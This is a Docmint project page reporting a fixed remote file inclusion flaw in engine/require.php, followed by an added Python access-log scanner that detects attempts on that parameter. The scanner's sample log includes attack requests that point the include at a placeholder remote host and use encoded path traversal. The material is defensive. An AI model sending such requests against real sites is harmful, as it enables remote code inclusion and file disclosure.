Docmint - The Documentation CMS

Last update: 2007-08-09 11:46:05

Bug Fixed: docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Exploit

There was a big security issue in docmint, discovered in October 2006. It has been fixed. Here is a short description of the security issue:

Input passed to the "MY_ENV[BASE_ENGINE_LOC]" parameter in engine/require.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.
The vulnerability has been confirmed in the SVN version from 2006-10-10. Other versions may also be affected.

To the security advocates reading this: it's great that security issues are being communicated widely. It's sad, though, to experience that a fixed security issue is apparently not communicated at all. I have reported the bug fix to various platforms and none have picked up on it. I guess, unfortunately, that security news is the same as any news: only bad news is good news.
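
A log check for the issue described above, as an added example that is not part of the original page or of the docmint code: it flags access-log requests to engine/require.php that supply MY_ENV[BASE_ENGINE_LOC] in the query string and classifies where the value points. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script and parameter named in the description above.
SCRIPT = "engine/require.php"
PARAM = "MY_ENV[BASE_ENGINE_LOC]"

# Assumption: "combined"-style access log lines with a quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A scheme of two or more characters (so "C:" is not a scheme) or a //host prefix.
REMOTE_RE = re.compile(r"(?:[a-z][a-z0-9+.-]+:|//)", re.I)

def classify(value):
    """Say where a supplied include location would point."""
    norm = value.replace("\\", "/")
    if REMOTE_RE.match(norm):
        return "remote"
    if ".." in norm.split("/"):
        return "traversal"
    if norm.startswith("/") or re.match(r"[A-Za-z]:/", norm):
        return "absolute"
    return "other"

def scan(lines):
    """Return (line number, client, class) for each request that sets PARAM."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith("/" + SCRIPT):
            continue
        # parse_qsl percent-decodes, so MY_ENV%5B...%5D is matched as well.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key == PARAM:
                findings.append((number, line.split()[0], classify(value)))
    return findings

# Constructed sample lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2006:13:55:36 +0000] "GET /index.php?page=intro HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2006:14:02:11 +0000] "GET /engine/require.php?MY_ENV[BASE_ENGINE_LOC]=http://host.example.invalid/file.txt HTTP/1.0" 200 312',
    '198.51.100.7 - - [10/Oct/2006:14:02:15 +0000] "GET /docs/engine/require.php?MY_ENV%5BBASE_ENGINE_LOC%5D=..%2F..%2Foutside%2Ffile.txt HTTP/1.1" 200 97',
    '203.0.113.4 - - [10/Oct/2006:14:10:00 +0000] "GET /engine/require.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only query-string parameters appear in an access log, so a value sent in a POST body is not seen by this check.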

